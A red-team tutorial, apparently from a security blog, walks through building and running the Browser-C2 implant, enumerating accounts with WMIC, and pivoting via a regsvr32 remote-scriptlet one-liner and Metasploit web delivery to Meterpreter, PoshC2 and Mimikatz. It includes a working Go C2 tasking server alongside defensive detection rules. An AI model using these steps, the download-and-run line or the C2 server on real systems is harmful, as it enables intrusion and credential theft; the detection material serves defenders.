Red teams are always looking for new ways to establish connections back to their command and control infrastructure. The main reasons that lead red teams to use standard protocols or native system functionality for command and control are to bypass restrictions on the host or the network and to stay off the radar of the blue team. 0x09AL developed Browser-C2 in Go, a tool which uses the Chrome browser as the communication channel and can therefore get past host-based firewalls, since the outbound traffic originates from a process that is normally permitted. 0x09AL described the idea and the operation of the tool in his blog.

The tool depends on the following two Go packages, which need to be fetched before building.

go get -u github.com/gorilla/mux
go get -u github.com/chzyer/readline

The implant can be compiled to an executable with the following command. Before doing so, the agent.go file needs to be edited to contain the IP address of the C2 server.

go build agent.go

Browser C2 – Converting the implant to executable

The jquery file also needs to be modified so that the url variable contains the IP address of the command and control server.

Browser C2 - jquery Configuration

The main command and control application can be compiled with the following:

go build

When the implant is executed on the target host, the Chrome browser starts and automatically reaches the command and control server endpoint.

Browser C2 – Agent Execution

A connection is established with the C2 server, and commands can be executed to retrieve host information.

Browser C2 – Command Execution
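The server side of a browser-polled channel like the one above, as an added example written for this page and not code from Browser-C2 or from 0x09AL: a minimal tasking loop in Go standard library only (gorilla/mux is not needed for it). The operator enqueues a command, the page loaded in the browser fetches it from GET /task and posts the output back to POST /result. The endpoint names, the JSON shape and the listen address are assumptions for this example; how Browser-C2 itself bridges the page to the local agent is not reproduced here.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"log"
	"net/http"
	"sync"
)

// Result is what the browser-side page posts back after a command has run.
type Result struct {
	Command string `json:"command"`
	Output  string `json:"output"`
}

// TaskQueue holds commands waiting for the agent and the results it reported.
// One in-memory queue serves one agent; a real server keys this by agent ID.
type TaskQueue struct {
	mu      sync.Mutex
	pending []string
	results []Result
}

// Enqueue is what the operator console calls to task the agent.
func (q *TaskQueue) Enqueue(cmd string) {
	q.mu.Lock()
	defer q.mu.Unlock()
	q.pending = append(q.pending, cmd)
}

// Next pops the oldest pending command, or returns "" when there is nothing to do.
func (q *TaskQueue) Next() string {
	q.mu.Lock()
	defer q.mu.Unlock()
	if len(q.pending) == 0 {
		return ""
	}
	cmd := q.pending[0]
	q.pending = q.pending[1:]
	return cmd
}

// Results returns a copy of everything reported so far.
func (q *TaskQueue) Results() []Result {
	q.mu.Lock()
	defer q.mu.Unlock()
	return append([]Result(nil), q.results...)
}

// Handler exposes the two endpoints the page in the browser polls:
// GET /task hands out the next command as plain text, POST /result takes the output as JSON.
// Everything travels as plain HTTP, which is the weakness the text flags: a proxy or
// network sensor on the path sees both the command and its output.
func (q *TaskQueue) Handler() http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/task", func(w http.ResponseWriter, r *http.Request) {
		if r.Method != http.MethodGet {
			w.WriteHeader(http.StatusMethodNotAllowed)
			return
		}
		fmt.Fprint(w, q.Next())
	})
	mux.HandleFunc("/result", func(w http.ResponseWriter, r *http.Request) {
		if r.Method != http.MethodPost {
			w.WriteHeader(http.StatusMethodNotAllowed)
			return
		}
		// Cap the body so a misbehaving client cannot exhaust memory on the server.
		body, err := io.ReadAll(io.LimitReader(r.Body, 1<<20))
		if err != nil {
			w.WriteHeader(http.StatusBadRequest)
			return
		}
		var res Result
		if err := json.Unmarshal(body, &res); err != nil {
			w.WriteHeader(http.StatusBadRequest)
			return
		}
		q.mu.Lock()
		q.results = append(q.results, res)
		q.mu.Unlock()
		w.WriteHeader(http.StatusNoContent)
	})
	return mux
}

func main() {
	q := &TaskQueue{}
	q.Enqueue("whoami") // first task the agent will pick up
	// Listen address is an assumption for this example.
	log.Fatal(http.ListenAndServe("0.0.0.0:8080", q.Handler()))
}
```

Run it and poll http://127.0.0.1:8080/task with curl to see the queued command handed out once and an empty body afterwards; the same request captured on the wire shows why a sensor needs no decryption to read this channel.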

The Windows Management Instrumentation command-line utility (WMIC) can also be used for additional host recon, for example to enumerate local accounts.

wmic useraccount list full

Browser C2 – User Enumeration via WMIC

Browser-C2 does not encrypt the communication between the server and the compromised host, so every tasked command and its output is visible in clear text to any proxy or network sensor on the path. It also has limited functionality: it cannot execute PowerShell scripts and can only be used for basic command execution. For further operations an alternative channel such as Meterpreter or PoshC2 can be considered. The Metasploit Framework web delivery module will generate and host a scriptlet automatically.

exploit/multi/script/web_delivery

Browser C2 – Metasploit Web Delivery Module

The regsvr32 technique, discovered by Casey Smith, bypasses AppLocker policies and is a reliable way to execute arbitrary code fetched from a remote URL. With the regsvr32 target of the web delivery module the generated one-liner has the form regsvr32 /s /n /u /i:http://<C2 IP>:<port>/<name>.sct scrobj.dll, which is short enough to be executed from an existing Browser-C2 agent session.

Browser C2 – Code Execution via regsvr32 Metasploit

Once the payload has been delivered, a Meterpreter session will open and provide enhanced capabilities.

Browser C2 – Meterpreter via Web Delivery
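The checks a blue team would put in front of this chain, as an added example that is not part of Browser-C2, Metasploit or PoshC2: three rules run over constructed Sysmon-style process-creation records. The field names Image, ParentImage and CommandLine are Sysmon's; the one-line key=value record format, the sample lines and the IP addresses are made up for this example. Rule 1 matches the regsvr32 web-delivery one-liner, rule 2 the browser being started by something other than the desktop shell (the implant launching Chrome, as in the agent execution step above), rule 3 the WMIC account enumeration shown earlier. The assumption that an interactive user launches Chrome from explorer.exe is a baseline choice for this example, not a fact about every environment.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a cut-down process-creation record using Sysmon event 1 field names.
type ProcEvent struct {
	Image       string
	ParentImage string
	CommandLine string
}

// ParseEvent reads one constructed "key=value|key=value" line into a ProcEvent.
// The format is invented for this example; a real pipeline would parse Sysmon XML/JSON.
func ParseEvent(line string) ProcEvent {
	var ev ProcEvent
	for _, field := range strings.Split(line, "|") {
		key, val, ok := strings.Cut(field, "=")
		if !ok {
			continue
		}
		switch strings.TrimSpace(key) {
		case "Image":
			ev.Image = strings.TrimSpace(val)
		case "ParentImage":
			ev.ParentImage = strings.TrimSpace(val)
		case "CommandLine":
			ev.CommandLine = strings.TrimSpace(val)
		}
	}
	return ev
}

// baseName lower-cases a path and returns its final component.
func baseName(path string) string {
	path = strings.ToLower(path)
	if i := strings.LastIndexAny(path, `\/`); i >= 0 {
		return path[i+1:]
	}
	return path
}

// Classify returns the names of the rules an event matches, in a fixed order.
func Classify(ev ProcEvent) []string {
	var hits []string
	img := baseName(ev.Image)
	parent := baseName(ev.ParentImage)
	cl := strings.ToLower(ev.CommandLine)

	// Rule 1: regsvr32 fetching a scriptlet over HTTP(S) through scrobj.dll,
	// the shape of the web_delivery regsvr32 one-liner.
	if img == "regsvr32.exe" && strings.Contains(cl, "/i:http") && strings.Contains(cl, "scrobj.dll") {
		hits = append(hits, "regsvr32_remote_scriptlet")
	}
	// Rule 2: Chrome started by something other than the shell or another Chrome
	// process. Baseline assumption: users launch Chrome from explorer.exe.
	if img == "chrome.exe" && parent != "explorer.exe" && parent != "chrome.exe" {
		hits = append(hits, "browser_unusual_parent")
	}
	// Rule 3: WMIC local account enumeration.
	if img == "wmic.exe" && strings.Contains(cl, "useraccount") {
		hits = append(hits, "wmic_user_enum")
	}
	return hits
}

// SampleLog is constructed telemetry, not captured from a real host.
var SampleLog = []string{
	`Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ParentImage=C:\Users\lab\agent.exe|CommandLine="chrome.exe" http://192.0.2.10/`,
	`Image=C:\Windows\System32\regsvr32.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=regsvr32 /s /n /u /i:http://192.0.2.10:8080/abc.sct scrobj.dll`,
	`Image=C:\Windows\System32\wbem\WMIC.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=wmic useraccount list full`,
	`Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ParentImage=C:\Windows\explorer.exe|CommandLine="chrome.exe"`,
}

// ScanLog classifies every line and returns line index -> rule hits for the lines that matched.
func ScanLog(lines []string) map[int][]string {
	out := map[int][]string{}
	for i, line := range lines {
		if hits := Classify(ParseEvent(line)); len(hits) > 0 {
			out[i] = hits
		}
	}
	return out
}

func main() {
	for i, line := range SampleLog {
		if hits := Classify(ParseEvent(line)); len(hits) > 0 {
			fmt.Printf("line %d: %s\n", i, strings.Join(hits, ","))
		}
	}
}
```

The last sample line, a normal Chrome launch from the desktop, produces no hit, which is the case the parent-process rule has to get right before it is worth deploying; in a real estate the allowed parents for rule 2 need tuning against the environment's own baseline.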

The same method can also be used to establish a connection with PoshC2 for PowerShell-based post-exploitation activities.

Browser C2 – Code Execution via regsvr32 for PoshC2

The implant handler of PoshC2 will receive the connection.

PoshC2 – Implant Handler

Interaction with the implant starts by selecting its ID. PoshC2 contains various PowerShell modules which can be used for extensive host reconnaissance and credential harvesting, such as Mimikatz.

Browser C2 – Mimikatz via Implant Handler

Mimikatz output will appear in the PoshC2 console.

Browser C2 – Mimikatz PoshC2
